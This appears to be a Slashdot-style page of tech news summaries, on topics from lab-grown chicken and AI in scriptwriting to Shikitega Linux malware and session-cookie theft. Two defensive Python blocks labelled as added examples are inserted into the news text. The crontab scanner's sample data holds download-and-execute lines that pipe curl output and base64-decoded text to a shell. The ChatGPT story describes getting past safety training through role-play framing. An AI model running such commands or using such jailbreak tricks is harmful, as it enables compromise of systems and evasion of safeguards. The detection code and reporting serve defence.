Biotech

FDA Clears Lab-Grown Chicken As Safe To Eat (cbsnews.com) 136

An anonymous reader quotes a report from CBS News: The Food and Drug Administration on Monday cleared "cultured chicken cell material" made by GOOD Meat as safe for use as human food. While the FDA said the lab-grown chicken was safe to eat, GOOD Meat still needs approval from the Agriculture Department before it can sell the product in the U.S. If approved, acclaimed chef Jose Andres plans to serve GOOD Meat's chicken to customers at his Washington, D.C. restaurant. He's on GOOD Meat's board of directors.

The FDA previously gave the green light to lab-grown chicken made by Upside Foods in November. Upside Foods and GOOD Meat both use cells from chickens to create the cultured chicken products. Once cells are extracted, GOOD Meat picks the cells most likely to produce healthy, sustainable and tasty meat, the company explained. The cells are immersed in nutrients inside a tank. They grow and divide, creating the cultured chicken, which can be harvested after four to six weeks. GOOD Meat's chicken is already sold in Singapore.
"Today's news is more than just another regulatory decision -- it's food system transformation in action," says Bruce Friedrich, president and founder of the Good Food Institute, a non-profit think tank that focuses on alternatives to traditional meat production.

"Consumers and future generations deserve the foods they love made more sustainably and in ways that benefit the public good -- ways that preserve our land and water, ways that protect our climate and global health," Friedrich says.

AI

The Writers Guild of America Would Allow AI In Scriptwriting, As Long as Writers Maintain Credit (variety.com) 51

The Writers Guild of America has proposed allowing artificial intelligence to write scripts, as long as it does not affect writers' credits or residuals. Variety reports: The guild had previously indicated that it would propose regulating the use of AI in the writing process, which has recently surfaced as a concern for writers who fear losing out on jobs. But contrary to some expectations, the guild is not proposing an outright ban on the use of AI technology. Instead, the proposal would allow a writer to use ChatGPT to help write a script without having to share writing credit or divide residuals. Or, a studio executive could hand the writer an AI-generated script to rewrite or polish and the writer would still be considered the first writer on the project.

In effect, the proposal would treat AI as a tool -- like Final Draft or a pencil -- rather than as a writer. It appears to be intended to allow writers to benefit from the technology without getting dragged into credit arbitrations with software manufacturers. The proposal does not address the scenario in which an AI program writes a script entirely on its own, without help from a person. The guild's proposal was discussed in the first bargaining session on Monday with the Alliance of Motion Picture and Television Producers. Three sources confirmed the proposal. It's not yet clear whether the AMPTP, which represents the studios, will be receptive to the idea. The WGA proposal states simply that AI-generated material will not be considered "literary material" or "source material." Those terms are key for assigning writing credits, which in turn have a big impact on residual compensation.

"Literary material" is a fundamental term in the WGA's minimum basic agreement -- it is what a "writer" produces (including stories, treatments, screenplays, dialogue, sketches, etc.). If an AI program cannot produce "literary material," then it cannot be considered a "writer" on a project. "Source material" refers to things like novels, plays and magazine articles, on which a screenplay may be based. If a screenplay is based on source material, then it is not considered an "original screenplay." The writer may also get only a "screenplay by" credit, rather than a "written by" credit. A "written by" credit entitles the writer to the full residual for the project, while a "screenplay by" credit gets 75%. By declaring that ChatGPT cannot write "source material," the guild would be saying that a writer could adapt an AI-written short story and still get full "written by" credit.

Privacy

BetterHelp Sold Customer Data While Promising It Was Private, Says FTC (theverge.com) 38

Online counseling company BetterHelp has agreed to pay $7.8 million to settle charges from the Federal Trade Commission that it improperly shared customers' sensitive data with companies like Facebook and Snapchat, even after promising to keep it private. The Verge reports: The proposed order, announced by the FTC on Thursday, would ban the same behavior in the future and require BetterHelp to make some changes to how it handles customer data. According to the regulator, the sign-up process for the company's service "promised consumers that it would not use or disclose their personal health data except for limited purposes." However, the FTC alleges that the company instead "used and revealed consumers' email addresses, IP addresses, and health questionnaire information to Facebook, Snapchat, Criteo, and Pinterest for advertising purposes."

The FTC also says that the company gave customer service agents false scripts to try and reassure users that it wasn't sharing personally identifiable or personal health information after a February 2020 report from Jezebel exposed some of its practices. The commission's complaint (PDF) accuses the company of misleading customers by putting a HIPAA seal on its website, despite the fact that "no government agency or other third party reviewed [BetterHelp]'s information practices for compliance with HIPAA, let alone determined that the practices met the requirements of HIPAA."

If the FTC's order ends up going through, the $7.8 million would go to customers who signed up for the service between August 1st, 2017, and December 31st, 2020. Here are some of the other things BetterHelp would be required to do:

- Stop sharing individually identifiable information about consumers' mental health with any third parties
- Stop misrepresenting its data collection and use policies
- Alert customers who created accounts before January 1st, 2021, that their personal info may have been used for advertising
- Obtain "affirmative express consent" from a customer before sharing information with a third party
- Reach out to third parties that received customer information and ask that it be deleted
- Establish a "comprehensive privacy program" and have an independent third party carry out privacy assessments

Television

Amazon Is Reportedly Making a Tomb Raider TV Series (hollywoodreporter.com) 43

Amazon is developing a TV series based on the Tomb Raider video game franchise with scripts written by Phoebe Waller-Bridge, according to The Hollywood Reporter. The Verge reports: Details are light on this new Tomb Raider series, but THR says that while Waller-Bridge will serve as a writer and executive producer, she won't be starring in the show. The show is apparently still in the development stages, so we probably shouldn't expect to see it anytime soon. This new series could be another potentially big video game franchise adaptation for Amazon, which announced in December that it would be making a God of War TV show. But it also marks a further investment from Amazon into the Tomb Raider franchise, as the company will also be publishing the next Tomb Raider game from Crystal Dynamics. Amazon didn't immediately reply to a request for comment.

Windows

'Debloating Windows 10 With One Command and No Scripts' (gabrielsieben.tech) 101

An anonymous reader writes: Recently, I had to set up a Windows 10 computer for one specific application in a semi-embedded use case. Anything else that Windows does or comes with is unnecessary for this. While there are plenty of internet scripts and apps for de-bloating Windows, I have found the easiest (and little known) way to debloat Windows without running any internet scripts is as follows:

1. Open PowerShell.
2. Type Get-AppxPackage | Remove-AppxPackage.
3. Ignore any error messages about packages that can't be removed; it's fine.

Will this work for everyone? No, of course not, but it's a great one-line, easily memorable tool for cleaning up a PC quickly for an industrial use case without any security risks.

Red Hat Software

Fedora Change Proposal: Supporting Unified Kernel Images for Improved Security (phoronix.com) 67

While "this proposal will only be implemented if approved by the Fedora Engineering Steering Committee," Phoronix reports: Red Hat and Fedora engineers are plotting a path to supporting Unified Kernel Images (UKI) with Fedora Linux and for the Fedora 38 release in the spring they are aiming to get their initial enablement in place.

Unified Kernel Images have been championed by the systemd folks for better securing and trusting Linux distributions. Unified kernel images are a combination of the kernel image, initrd, and UEFI stub program all distributed as one.... The initial phase would focus on shipping a UKI as an optional sub-RPM that users can opt into initially, updating kernel install scripts so unified kernels are installed and properly updated, and bootloader support for unified kernel images. Adding systemd-boot support to the installers, better measurement and remote attestation support, and switching Fedora Cloud images to using unified kernels are among the additional goals but of lower priority.

Fedora's wiki includes a detailed description of the change proposal: The goal is to move away from initrd images being generated on the installed machine. They are generated while building the kernel package instead, then shipped as part of a unified kernel image. A unified kernel image is an all-in-one efi binary containing kernel, initrd, cmdline and signature....

Main motivation for this move is to make the distro more robust and more secure.

Security

Kremlin-Backed Hackers Targeted a 'Large' Petroleum Refinery In a NATO Nation (arstechnica.com) 68

An anonymous reader quotes a report from Ars Technica: One of the Kremlin's most active hacking groups targeting Ukraine recently tried to hack a large petroleum refining company located in a NATO country. The attack is a sign that the group is expanding its intelligence gathering as Russia's invasion of its neighboring country continues. The attempted hacking occurred on August 30 and was unsuccessful, researchers with Palo Alto Networks' Unit 42 said on Tuesday. The hacking group -- tracked under various names including Trident Ursa, Gamaredon, UAC-0010, Primitive Bear, and Shuckworm -- has been attributed by Ukraine's Security Service to Russia's Federal Security Service.

In the past 10 months, Unit 42 has mapped more than 500 new domains and 200 samples and other bread crumbs Trident Ursa has left behind in spear phishing campaigns attempting to infect targets with information-stealing malware. The group mostly uses emails with Ukrainian-language lures. More recently, however, some samples show that the group has also begun using English-language lures. "We assess that these samples indicate that Trident Ursa is attempting to boost their intelligence collection and network access against Ukrainian and NATO allies," company researchers wrote. Among the filenames used in the unsuccessful attack were: MilitaryassistanceofUkraine.htm, Necessary_military_assistance.rar, and List of necessary things for the provision of military humanitarian assistance to Ukraine.lnk. Tuesday's report didn't name the targeted petroleum company or the country where the facility was located. In recent months, Western-aligned officials have issued warnings that the Kremlin has set its sights on energy companies in countries opposing Russia's war on Ukraine.

Trident Ursa's hacking techniques are simple but effective. The group uses multiple ways to conceal the IP addresses and other signatures of its infrastructure, phishing documents with low detection rates among anti-phishing services, and malicious HTML and Word documents. Unit 42 researchers wrote: "Trident Ursa remains an agile and adaptive APT that does not use overly sophisticated or complex techniques in its operations. In most cases, they rely on publicly available tools and scripts -- along with a significant amount of obfuscation -- as well as routine phishing attempts to successfully execute their operations..." Tuesday's report provides a list of cryptographic hashes and other indicators organizations can use to determine if Trident Ursa has targeted them. It also provides suggestions for ways to protect organizations against the group.

AI

DeepMind Created An AI Tool That Can Help Generate Rough Film and Stage Scripts 26

Alphabet's DeepMind has built an AI tool that can help generate rough film and stage scripts. Engadget's Kris Holt reports: Dramatron is a so-called "co-writing" tool that can generate character descriptions, plot points, location descriptions and dialogue. The idea is that human writers will be able to compile, edit and rewrite what Dramatron comes up with into a proper script. Think of it like ChatGPT, but with output that you can edit into a blockbuster movie script. To get started, you'll need an OpenAI API key and, if you want to reduce the risk of Dramatron outputting "offensive text," a Perspective API key. To test out Dramatron, I fed in the log line for a movie idea I had when I was around 15 that definitely would have been a hit if Kick-Ass didn't beat me to the punch. Dramatron quickly whipped up a title that made sense, and character, scene and setting descriptions. The dialogue that the AI generated was logical but trite and on the nose. Otherwise, it was almost as if Dramatron pulled the descriptions straight out of my head, including one for a scene that I didn't touch on in the log line.

Playwrights seemed to agree, according to a paper (PDF) that the team behind Dramatron presented today. To test the tool, the researchers brought in 15 playwrights and screenwriters to co-write scripts. According to the paper, playwrights said they wouldn't use the tool to craft a complete play and found that the AI's output can be formulaic. However, they suggested Dramatron would be useful for world building or to help them explore other approaches in terms of changing plot elements or characters. They noted that the AI could be handy for "creative idea generation" too. That said, a playwright staged four plays that used "heavily edited and rewritten scripts" they wrote with the help of Dramatron. DeepMind said that in the performance, experienced actors with improv skills "gave meaning to Dramatron scripts through acting and interpretation."

AI

OpenAI's New Chatbot Can Explain Code and Write Sitcom Scripts But Is Still Easily Tricked 38

OpenAI has released a prototype general purpose chatbot that demonstrates a fascinating array of new capabilities but also shows off weaknesses familiar to the fast-moving field of text-generation AI. And you can test out the model for yourself right here. The Verge reports: ChatGPT is adapted from OpenAI's GPT-3.5 model but trained to provide more conversational answers. While GPT-3 in its original form simply predicts what text follows any given string of words, ChatGPT tries to engage with users' queries in a more human-like fashion. As you can see in the examples below, the results are often strikingly fluid, and ChatGPT is capable of engaging with a huge range of topics, demonstrating big improvements to chatbots seen even a few years ago. But the software also fails in a manner similar to other AI chatbots, with the bot often confidently presenting false or invented information as fact. As some AI researchers explain it, this is because such chatbots are essentially "stochastic parrots" -- that is, their knowledge is derived only from statistical regularities in their training data, rather than any human-like understanding of the world as a complex and abstract system. [...]

Enough preamble, though: what can this thing actually do? Well, plenty of people have been testing it out with coding questions and claiming its answers are perfect. ChatGPT can also apparently write some pretty uneven TV scripts, even combining actors from different sitcoms. It can explain various scientific concepts. And it can write basic academic essays. And the bot can combine its fields of knowledge in all sorts of interesting ways. So, for example, you can ask it to debug a string of code ... like a pirate, for which its response starts: "Arr, ye scurvy landlubber! Ye be makin' a grave mistake with that loop condition ye be usin'!" Or get it to explain bubble sort algorithms like a wise guy gangster. ChatGPT also has a fantastic ability to answer basic trivia questions, though examples of this are so boring I won't paste any in here. And here is someone else saying that the code ChatGPT provides in the very answer above is garbage.

I'm not a programmer myself, so I won't make a judgment on this specific case, but there are plenty of examples of ChatGPT confidently asserting obviously false information. Here's computational biology professor Carl Bergstrom asking the bot to write a Wikipedia entry about his life, for example, which ChatGPT does with aplomb -- while including several entirely false biographical details. Another interesting set of flaws comes when users try to get the bot to ignore its safety training. If you ask ChatGPT about certain dangerous subjects, like how to plan the perfect murder or make napalm at home, the system will explain why it can't tell you the answer. (For example, "I'm sorry, but it is not safe or appropriate to make napalm, which is a highly flammable and dangerous substance.") But, you can get the bot to produce this sort of dangerous information with certain tricks, like pretending it's a character in a film or that it's writing a script on how AI models shouldn't respond to these sorts of questions.

Medicine

FDA Officially Declares a Shortage of Adderall (npr.org) 66

An anonymous reader quotes a report from NPR: The FDA has confirmed the nation is experiencing a shortage of Adderall after many pharmacies around the country have been unable to fill prescriptions and keep up with demand. The drug, which is also known as mixed amphetamine salts, is used to treat attention-deficit/hyperactivity disorder (ADHD) and narcolepsy. "We will continue to monitor supply and assist manufacturers with anything needed to resolve the shortage and will update our website with new supply information as it becomes available," the FDA said.

Expected recovery times for manufacturers' supplies of the prescription vary. Teva Pharmaceuticals, which sells the most Adderall in the U.S., has a 10 mg dosage of Adderall that is expected to rebound in October. But many of its generic brand offerings aren't expected to recover until March 2023. Manufacturer SpecGX's higher doses won't recoup until January 2023, while Rhodes Pharmaceuticals has a shortage of an active ingredient. Bloomberg health reporter Ike Swetlitz told NPR last month the shortages began due to a labor shortage at Teva, causing production delays that began showing up at other companies. Additionally, an increase in ADHD diagnoses has been driving up demand for Adderall in recent years.

Operating Systems

Basic Rust Support Merged For Upcoming Linux 6.1 (phoronix.com) 83

"This Monday, the first set of patches to enable Rust support and tooling was merged for Linux 6.1," writes Slashdot reader sabian2008, sharing an update from longtime kernel developer Kees Cook: The tree has a recent base, but has fundamentally been in linux-next for a year and a half. It's been updated based on feedback from the Kernel Maintainer's Summit, and to gain recent Reviewed-by: tags. Miguel is the primary maintainer, with me helping where needed/wanted. Our plan is for the tree to switch to the standard non-rebasing practice once this initial infrastructure series lands. The contents are the absolute minimum to get Rust code building in the kernel, with many more interfaces[2] (and drivers -- NVMe[3], 9p[4], M1 GPU[5]) on the way.

The initial support of Rust-for-Linux comes in roughly 4 areas:
- Kernel internals (kallsyms expansion for Rust symbols, %pA format)
- Kbuild infrastructure (Rust build rules and support scripts)
- Rust crates and bindings for initial minimum viable build
- Rust kernel documentation and samples

Further reading: Linux 6.0 Arrives With Support For Newer Chips, Core Fixes, and Oddities

Media

CIA Launches First Podcast, 'The Langley Files' (variety.com) 50

The Central Intelligence Agency (CIA) is launching a podcast called "The Langley Files." As the agency explains, "The mission of 'The Langley Files: A CIA Podcast' is to educate and connect with the general public, sharing insight into the Agency's core mission, capabilities and agility as an intelligence leader... and to share some interesting stories along the way!" Variety reports: The podcast features suspenseful intro music and a narrator explaining that CIA will be "sharing what we can" with stories that go "beyond those of Hollywood scripts and shadowed whispers." CIA Director Bill Burns is the featured guest on Episode 1 of "The Langley Files." "We do usually operate in the shadows, out of sight and out of mind," Burns said in the premiere. However, he continued, "in our democracy, where trust in institutions is in such short supply... it's important to try to explain ourselves the best we can and to demystify a little bit of what we do."

According to Burns, one of the biggest misconceptions people have about the CIA stems from Hollywood's depictions of intelligence field agents. Many people think CIA is a "glamorous world" of "heroic individuals who drive fast cars and defuse bombs and solve world crises all on their own" -- a la Jason Bourne, James Bond and Jack Ryan. (Bond is a British spy, but you get the drift.) On the podcast, Burns shared that he drives a 2013 Subaru Outback "at posted speed limits." [...] The CIA says each episode of the podcast will be about 15-30 minutes long and will "feature our hosts leading conversations with a range of special guests." The series is distributed on major audio platforms including Apple Podcasts, Spotify, Google Podcasts, Amazon Music and Player.fm.
"From all of us here at CIA -- we'll be seeing you," said one of the hosts before signing off the inaugural episode.

Security

Powerful New Linux Malware Shikitega Uses Unusual Multi-Stage Stealth (att.com) 22

Here's a warning from the threat intelligence unit of AT&T Cybersecurity, AT&T Alien Labs: With a rise of nearly 650% in malware and ransomware for Linux this year, reaching an all-time high in the first half year of 2022, threat actors find servers, endpoints and IoT devices based on Linux operating systems more and more valuable and find new ways to deliver their malicious payloads. New malwares like BotenaGo and EnemyBot are examples of how malware writers rapidly incorporate recently discovered vulnerabilities to find new victims and increase their reach.
But they've discovered a new malware targeting Linux endpoints and IoT devices, stealthily "delivered in a multistage infection chain where each module responds to a part of the payload and downloads and executes the next one. An attacker can gain full control of the system, in addition to the cryptocurrency miner that will be executed and set to persist."

The Register summarizes their report: The malware was dubbed "Shikitega" for its extensive use of the popular Shikata Ga Nai polymorphic encoder, which allows the malware to "mutate" its code to avoid detection. Shikitega alters its code each time it runs through one of several decoding loops that AT&T said each deliver multiple attacks, beginning with an ELF file that's just 370 bytes... AT&T didn't say how the initial infection occurs, but it did say Shikitega exploits two Linux vulnerabilities disclosed in 2021 to achieve its ultimate objective, which AT&T said appears to be the installation and execution of the XMRig cryptocurrency miner.

The final stage also establishes persistence, which Shikitega does by downloading and executing five shell scripts that configure a pair of cron jobs for the current user and a pair for the root user using crontab, which it can also install if not available. Shikitega also uses cloud hosting solutions to store parts of its payload, which it further uses to obfuscate itself by contacting via IP address instead of domain name....
Bottom line: Shikitega is a nasty piece of code. AT&T recommends Linux endpoint and IoT device managers keep security patches installed, keep EDR software up to date and make regular backups of essential systems.

Ars Technica reports: The ultimate objective of the malware isn't clear. It drops the XMRig software for mining the Monero cryptocurrency, so stealthy cryptojacking is one possibility. But Shikitega also downloads and executes a powerful Metasploit package known as Mettle, which bundles capabilities including webcam control, credential stealing, and multiple reverse shells into a package that runs on everything from "the smallest embedded Linux targets to big iron." Mettle's inclusion leaves open the potential that surreptitious Monero mining isn't the sole function....

Given the work the unknown threat actors responsible devoted to the malware's stealth, it wouldn't be surprising if the malware is lurking undetected on some systems.
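The persistence mechanism described above (cron jobs for the current user and for root that fetch and run the next stage, with infrastructure reached by bare IP address) is something a defender can check for directly. The following is an added example, not code from the AT&T Alien Labs or Ars Technica reports: it scans crontab text for the generic download-and-execute, bare-IP-URL, run-from-temp and base64-decode patterns, using heuristics chosen for this example rather than any published Shikitega signature, over a constructed sample crontab.

```python
"""Flag crontab entries that match a download-and-execute persistence pattern.

Added example for this story, not the vendor's own detection logic. The
regexes below are illustrative heuristics; a real deployment would tune
them and pair them with file and process telemetry.
"""
from __future__ import annotations

import re
import subprocess

# Heuristic patterns (assumptions made for this example).
DOWNLOAD_TOOLS = re.compile(r"\b(curl|wget)\b")
PIPE_TO_SHELL = re.compile(r"\|\s*(sh|bash|dash|zsh)\b")
# A URL whose host is a literal IPv4 address rather than a hostname.
BARE_IP_URL = re.compile(r"https?://\d{1,3}(?:\.\d{1,3}){3}(?::\d+)?/")
# Commands launched from world-writable temp locations.
TMP_EXEC = re.compile(r"(?:^|\s|/)(?:tmp|var/tmp|dev/shm)/\S+")
DECODE_EXEC = re.compile(r"base64\s+(-d|--decode)\b")


def classify_cron_line(line: str) -> list[str]:
    """Return the names of every heuristic matched by one crontab line."""
    stripped = line.strip()
    if not stripped or stripped.startswith("#"):
        return []
    hits: list[str] = []
    if DOWNLOAD_TOOLS.search(stripped) and PIPE_TO_SHELL.search(stripped):
        hits.append("download-and-execute")
    if BARE_IP_URL.search(stripped):
        hits.append("bare-ip-url")
    if TMP_EXEC.search(stripped):
        hits.append("runs-from-tmp")
    if DECODE_EXEC.search(stripped):
        hits.append("base64-decode")
    return hits


def scan_crontab(text: str) -> list[tuple[int, str, list[str]]]:
    """Scan a whole crontab; return (line_no, line, hits) for flagged lines."""
    findings = []
    for n, line in enumerate(text.splitlines(), start=1):
        hits = classify_cron_line(line)
        if hits:
            findings.append((n, line, hits))
    return findings


def read_user_crontab(user: str | None = None) -> str:
    """Read a live crontab via `crontab -l` (or `crontab -u USER -l` as root).

    Returns an empty string when the user has no crontab.
    """
    cmd = ["crontab", "-l"] if user is None else ["crontab", "-u", user, "-l"]
    result = subprocess.run(cmd, capture_output=True, text=True)
    return result.stdout if result.returncode == 0 else ""


# Constructed sample crontab; not captured from an infected host.
# 203.0.113.0/24 is a documentation range and resolves to nothing.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/bin/certbot renew --quiet
*/5 * * * * curl -s http://203.0.113.10:8080/s1 | sh
@reboot /tmp/.x/run.sh
0 * * * * echo aGVsbG8= | base64 -d | bash
"""

if __name__ == "__main__":
    # Run over the embedded sample; swap in read_user_crontab() for a live check.
    for n, line, hits in scan_crontab(SAMPLE_CRONTAB):
        print(f"line {n}: {', '.join(hits)}: {line}")
```

Running the same scan for each account in /etc/passwd (and over /etc/cron.d) covers the root and per-user jobs the report describes.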

AI

Actors Worry That AI is Taking Centre Stage 110

A survey this year by Equity, the UK union for actors and other performing arts workers, found that 65 per cent of members thought AI posed a threat to employment opportunities in the sector, rising to 93 per cent of audio artists. This wasn't just an amorphous fear about the future: more than a third of members had seen job listings for work involving AI and almost a fifth had undertaken some of this work. From a report: A range of AI start-ups are developing tools for use in film and audio, from making actors look and sound younger to creating AI voices that can be used for marketing campaigns, consumer assistants or even audiobook narration. Audio is such a popular medium now that companies need lots of it, but human actors are expensive and nowhere near as flexible as an AI voice, which can be made to say anything at the push of a button. These companies typically hire actors to provide hours' worth of audio which can then be turned into a voice-for-hire.

VocaliD, for example, offers a range of voices such as "Malik" ("warm, soothing, urban") "Terri" ("educated, optimistic, sophisticated") and "AI Very British Voice" ("trustworthy, warm, calm.") Sonantic, another AI company which was just acquired by Spotify, creates voices that can laugh, shout or cry. Its voices are often used by video game companies in the production process so they can play around with different scripts. They're not as good as humans, but they don't need to be. Industry experts say no one is going to use AI to narrate the audiobook of a bestselling novel, but there is still a market to be tapped in the vast number of lower-profile books that are published or self-published every year. Audiobook.ai, for example, says it can create an audiobook in 10 minutes with 146 voices to choose from in 43 languages.

Security

Hackers Are Stealing Session Cookies To Bypass Multi-factor Authentication (esecurityplanet.com) 28

Slashdot reader storagedude writes: Hackers are stealing cookies from current or recent web sessions to bypass multi-factor authentication (MFA), according to an eSecurity Planet report.

The attack method, reported by Sophos researchers, is already growing in use. The "cookie-stealing cybercrime spectrum" is broad, the researchers wrote, ranging from "entry-level criminals" to advanced adversaries, using various techniques.

Cybercriminals collect cookies or buy stolen credentials "in bulk" on dark web forums. Ransomware groups also harvest cookies and "their activities may not be detected by simple anti-malware defenses because of their abuse of legitimate executables, both already present and brought along as tools," the researchers wrote.

Browsers allow users to maintain authentication, remember passwords and autofill forms. That might seem convenient, but attackers can exploit this functionality to steal credentials and skip the login challenge.

Behind the scenes, browsers use SQLite database files that contain cookies. These cookies are composed of key-value pairs, and the values often contain critical information such as tokens and expiration dates.

Adversaries know the exact name and location of these files for all major browsers such as Chrome, Firefox, and even Brave, on various operating systems. That's why the attack can be scripted. It's not uncommon to find such scripts along with other modules in info-stealing and other malware.

For example, the latest version of the Emotet botnet targets cookies and credentials stored by browsers, which include saved credit cards. According to the Sophos researchers, "Google's Chrome browser uses the same encryption method to store both multi-factor authentication cookies and credit card data."

To gain initial access, attackers can also perform phishing and spear-phishing campaigns to implant droppers that can deploy cookie-stealer malware stealthily.

The cookies are then used for post-exploitation and lateral movements. Cybercriminals can use them to change passwords and emails associated with user accounts, or trick the victims into downloading additional malware, or even deploy other exploitation tools such as Cobalt Strike and Impacket kit.

Users should not use built-in features to save passwords unless the browser encrypts them with, at least, a master password. It's recommended that users uncheck the setting called "remember passwords," and users should probably not allow persistent sessions either.

Developers can be part of the problem if they don't secure authentication cookies properly. Such cookies must have a short expiration date. Otherwise, the persistent authentication could turn into a persistent threat. You can have great security processes and still get hacked because the cookies do not have the necessary flags (e.g., HttpOnly, Secure attribute). For example, authentication cookies must be sent using SSL/TLS channels. Otherwise the data could be sent in plain text and attackers would only have to sniff traffic to intercept credentials.
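The cookie attributes the submission names (Secure, HttpOnly, a short expiry) and the key-value structure it mentions earlier are easy to check mechanically. The following is an added example, not part of storagedude's submission or the eSecurity Planet report: it parses Set-Cookie header values and reports missing protections, also checking SameSite and a maximum lifetime (the 8-hour limit is an assumption for this example), over constructed sample headers.

```python
"""Audit Set-Cookie headers for the session-cookie protections discussed above.

Added example, not from the article. Each header is split into its
name=value pair and attribute map, then checked for Secure, HttpOnly,
SameSite and an upper bound on lifetime (Max-Age or Expires).
"""
from __future__ import annotations

from dataclasses import dataclass, field
from datetime import datetime, timezone
from email.utils import parsedate_to_datetime

# Assumed policy for this example: a session cookie lives at most 8 hours.
MAX_LIFETIME_SECONDS = 8 * 3600


@dataclass
class CookieFinding:
    name: str
    problems: list[str] = field(default_factory=list)


def parse_set_cookie(header: str) -> tuple[str, str, dict[str, str | None]]:
    """Split a Set-Cookie value into (name, value, {attribute_lower: value})."""
    parts = [p.strip() for p in header.split(";")]
    name, _, value = parts[0].partition("=")
    attrs: dict[str, str | None] = {}
    for part in parts[1:]:
        if not part:
            continue
        key, sep, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip() if sep else None
    return name.strip(), value, attrs


def cookie_lifetime_seconds(attrs: dict[str, str | None],
                            now: datetime | None) -> int | None:
    """Lifetime in seconds, or None for a browser-session cookie.

    Max-Age takes precedence over Expires (RFC 6265); unparsable values are
    treated as session-only rather than guessed.
    """
    if attrs.get("max-age") is not None:
        try:
            return int(attrs["max-age"])
        except ValueError:
            return None
    if attrs.get("expires"):
        try:
            exp = parsedate_to_datetime(attrs["expires"])
        except (TypeError, ValueError):
            return None
        if exp.tzinfo is None:
            exp = exp.replace(tzinfo=timezone.utc)
        now = now or datetime.now(timezone.utc)
        return int((exp - now).total_seconds())
    return None


def audit_set_cookie(header: str, now: datetime | None = None,
                     max_lifetime: int = MAX_LIFETIME_SECONDS) -> CookieFinding:
    """Report the protections a session cookie is missing."""
    name, _value, attrs = parse_set_cookie(header)
    finding = CookieFinding(name=name)
    if "secure" not in attrs:
        finding.problems.append("missing Secure: may be sent over plain HTTP")
    if "httponly" not in attrs:
        finding.problems.append("missing HttpOnly: readable by page scripts")
    if (attrs.get("samesite") or "").lower() not in ("lax", "strict"):
        finding.problems.append("SameSite not Lax/Strict: sent cross-site")
    lifetime = cookie_lifetime_seconds(attrs, now)
    if lifetime is not None and lifetime > max_lifetime:
        finding.problems.append(f"lifetime {lifetime}s exceeds {max_lifetime}s")
    return finding


# Constructed sample headers; not captured from any real service.
SAMPLE_HEADERS = [
    "session=abc123; Path=/; Max-Age=2592000",
    "session=abc123; Path=/; Secure; HttpOnly; SameSite=Lax; Max-Age=3600",
    "session=abc123; Path=/; Secure; HttpOnly; SameSite=Strict",
]


def audit_all(headers: list[str] = SAMPLE_HEADERS) -> list[CookieFinding]:
    return [audit_set_cookie(h) for h in headers]


if __name__ == "__main__":
    for f in audit_all():
        print(f"{f.name}: {'OK' if not f.problems else '; '.join(f.problems)}")
```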

NASA

The James Webb Space Telescope Runs JavaScript, Apparently (theverge.com) 60

It turns out that JavaScript had a hand in delivering the stunning images that the James Webb Space Telescope has been beaming back to Earth. From a report: I mean that the actual telescope, arguably one of humanity's finest scientific achievements, is largely controlled by JavaScript files. Oh, and it's based on a software development kit from 2002. According to a manuscript (PDF) for the JWST's Integrated Science Instrument Module (or ISIM), the software for the ISIM is controlled by "the Script Processor Task (SP), which runs scripts written in JavaScript upon receiving a command to do so." The actual code in charge of turning those JavaScripts (NASA's phrasing, not mine) into actions can run 10 of them at once.

The manuscript and the paper (PDF) "JWST: Maximizing efficiency and minimizing ground systems," written by the Space Telescope Science Institute's Ilana Dashevsky and Vicki Balzano, describe this process in great detail, but I'll oversimplify a bit to save you the pages of reading. The JWST has a bunch of these pre-written scripts for doing specific tasks, and scientists on the ground can tell it to run those tasks. When they do, those JavaScripts will be interpreted by a program called the script processor, which will then reach out to the other applications and systems that it needs to based on what the script calls for. The JWST isn't running a web browser where JavaScript directly controls the Mid-Infrared Instrument -- it's more like when a manager is given a list of tasks (in this example, the JavaScripts) to do and delegates them out to their team.

Microsoft

DuckDuckGo Browser's Stricter Privacy Protection Will Also Apply To Microsoft Scripts Now (theverge.com) 22

After a revelation in May that DuckDuckGo's (DDG) privacy-focused web browser allows Microsoft tracking scripts on third-party websites, the company now says it will start blocking those too. From a report: DuckDuckGo's browser had third-party tracker loading protection by default that already blocked scripts embedded on websites from Facebook, Google, and others, but until now Microsoft's scripts from the Bing and LinkedIn domains (but not its third-party cookies) had a pass.

A security researcher named Zach Edwards pointed out the exclusion that he apparently uncovered while auditing the browser's privacy claims, and noted it is especially curious because Microsoft is the partner that delivers ads in DDG's search engine (while promising not to use that data to create a monitored profile of users to target ads, instead relying on context to decide which ones it should show). DuckDuckGo CEO Gabe Weinberg said at the time that the reason for it was a search syndication agreement with Microsoft, and that more updates on third-party tracker preventions were coming. A backlash ensued, with some seizing on DuckDuckGo's own words that "tracking is tracking," a phrase the company used against Google's cookie-replacing "privacy sandbox" ad technology. Now Weinberg writes in a blog post, "I've heard from a number of users and understand that we didn't meet their expectations around one of our browser's web tracking protections." DuckDuckGo is vowing to be more transparent about what trackers its browser and extensions are protecting users from, making its tracker blocklists available and offering users more information on how its tracking protections work, with a new help page.

Programming

Meet Bun, a Speedy New JavaScript Runtime (bun.sh) 121

Bun is "a modern JavaScript runtime like Node or Deno," according to its newly-launched web site, "built from scratch to focus on three main things."

- Start fast (it has the edge in mind).
- New levels of performance (extending JavaScriptCore, the engine).
- Being a great and complete tool (bundler, transpiler, package manager).

Bun is designed as a drop-in replacement for your current JavaScript & TypeScript apps or scripts — on your local computer, server or on the edge. Bun natively implements hundreds of Node.js and Web APIs, including ~90% of Node-API functions (native modules), fs, path, Buffer and more. [And Bun also implements Node.js' module resolution algorithm, so you can use npm packages in bun.js]

The goal of Bun is to run most of the world's JavaScript outside of browsers, bringing performance and complexity enhancements to your future infrastructure, as well as developer productivity through better, simpler tooling.... Why is Bun fast? An enormous amount of time spent profiling, benchmarking and optimizing things. The answer is different for every part of Bun, but one general theme: [it's written in Zig.] Zig's low-level control over memory and lack of hidden control flow makes it much simpler to write fast software.

An infographic on the site claims its server-side rendering of React is more than three times faster than Node or Deno. And Bun.js can even automatically load environment variables from .env files, according to the site. No more require("dotenv").load()
Hackaday describes it as "a performant all-in-one approach," including "bundling, transpiling, module resolution, and a fantastic foreign-function interface." Many JavaScript projects have a bundling and transpiling step that takes the source and packages it together in a more standard format. TypeScript needs to be packaged into JavaScript, and modules need to be resolved. Bun bakes all this in. TypeScript and JSX "just work." This dramatically simplifies many projects as much of the build infrastructure is part of Bun itself, lowering cognitive load when trying to understand a project... Some web-specific APIs, such as fetch and Websockets, are also built-in.
"What's even wilder is that Bun is written by one person, Jared Sumner," the article points out — adding that all the code is available on GitHub under the MIT License ("excluding dependencies which have various licenses.")

Crime

